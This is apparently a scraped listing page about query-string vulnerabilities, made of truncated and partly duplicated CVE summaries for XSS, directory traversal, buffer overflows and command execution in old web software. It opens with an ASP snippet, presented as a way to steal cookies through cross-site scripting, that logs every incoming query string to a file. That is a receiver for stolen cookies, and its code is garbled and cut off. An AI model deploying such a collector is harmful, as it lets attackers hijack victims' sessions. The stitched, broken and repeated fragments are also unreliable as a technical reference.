Cross-site attacks-steal cookies-vulnerability warning-the black bar safety net

% msg=Request. ServerVariables"QUERYSTRING" testfile=Server. MapPath"cook.txt" set fs=server. CreateObject"scripting. filesystemobject" set thisfile=fs. OpenTextFiletestfile,8,True,0 thisfile. Writeline""&msg& "" thisfile. close set fs = nothing % scriptwindow...

CVE-2005-4041

Cross-site scripting XSS vulnerability in search.cgi in MR CGI Guy Hot Links SQL 3.1.x and Hot Links Pro 3.1.x allows remote attackers to inject arbitrary web script or HTML via the query string...

CVE-2005-3745

Cross-site scripting XSS vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message...

CVE-2005-3498

IBM WebSphere Application Server 5.0.x before 5.02.15, 5.1.x before 5.1.1.8, and 6.x before fixpack V6.0.2.5, when session trace is enabled, records a full URL including the queryString in the trace logs when an application encodes a URL, which could allow attackers to obtain sensitive informatio...

Sybase EAServer WebConsole buffer overflow

Added: 11/04/2005 CVE: CVE-2005-2297 BID: 14287 OSVDB: 17995 Background Sybase EAServer is a web application server. Problem A buffer overflow in the Sybase EAServer WebConsole allows a remote attcker to execute arbitrary commands by requesting /WebConsole/Login.jsp with a long query string...

CVE-2005-3127

Cross-site scripting XSS vulnerability in index.php in lucidCMS 1.0.11 allows remote attackers to inject arbitrary web script or HTML via the query string...

CVE-2005-3127

Cross-site scripting XSS vulnerability in index.php in lucidCMS 1.0.11 allows remote attackers to inject arbitrary web script or HTML via the query string...

CVE-2005-2453

Cross-site scripting XSS vulnerability in NetworkActiv Web Server 1.0, 2.0.0.6, 3.0.1.1, and 3.5.13, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the query string...

CVE-2005-2453

Cross-site scripting XSS vulnerability in NetworkActiv Web Server 1.0, 2.0.0.6, 3.0.1.1, and 3.5.13, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the query string...

CVE-2000-1231

The CVE describes a vulnerability in Phorum 3.0.7 where code.php3 allows remote attackers to read arbitrary files within the Phorum directory via the query string. The affected software is Phorum 3.0.7; the vulnerable component is the code.php3 execution path that mishandles query strings, enabli...

CVE-2002-1926

Directory traversal vulnerability in source.php in Aquonics File Manager 1.5 allows remote attackers to read arbitrary files via a .. dot dot in the HTTP query string...

CVE-2002-1973

The CVE-2002-1973 entry describes a buffer overflow in CHttpServer::OnParseError of the ISAPI extension (Isapi.cpp) when built with MFC static libraries in Visual C++ 5.0 and 6.0 before SP3. This flaw, present in multiple products (including BadBlue), can be triggered by a long query string that ...

CVE-2002-1732

Multiple cross-site scripting XSS vulnerabilities in Actinic Catalog 4.7.0 allow remote attackers to inject arbitrary web script or HTML via 1 the query string argument to certain .pl files, 2 the REFPAGE parameter to ca000007.pl, 3 PRODREF parameter to ss000007.pl, or 4 hop parameter to...

CVE-2004-2128

Cross-site scripting XSS vulnerability in BRS WebWeaver 1.07 allows remote attackers to execute arbitrary script as other users via the query string to ISAPISkeleton.dll...

CVE-2005-0883

CVE-2005-0883 describes two reflected XSS vulnerabilities in DigitalHive 2.0's base.php: (1) mt parameter to membres.php and (2) -afs-1- query string to msg.php. Attackers can inject arbitrary web script/HTML via these inputs. The provided documents do not specify a patch or workaround within thi...

CVE-2004-2183

Unknown vulnerability in WeHelpBUS 0.1 allows remote attackers to execute arbitrary shell commands via the query string...

CVE-2004-0096

Unknown vulnerability in modpython 2.7.9 allows remote attackers to cause a denial of service httpd crash via a certain query string, a variant of CAN-2003-0973...

CVE-2004-0227

Buffer overflow in the zms script in ZoneMinder before 1.19.2 may allow a remote attacker to execute arbitrary code via a long query string...

DEBIAN-CVE-2004-0227

Buffer overflow in the zms script in ZoneMinder before 1.19.2 may allow a remote attacker to execute arbitrary code via a long query string...

CVE-2004-0096

Unknown vulnerability in modpython 2.7.9 allows remote attackers to cause a denial of service httpd crash via a certain query string, a variant of CAN-2003-0973...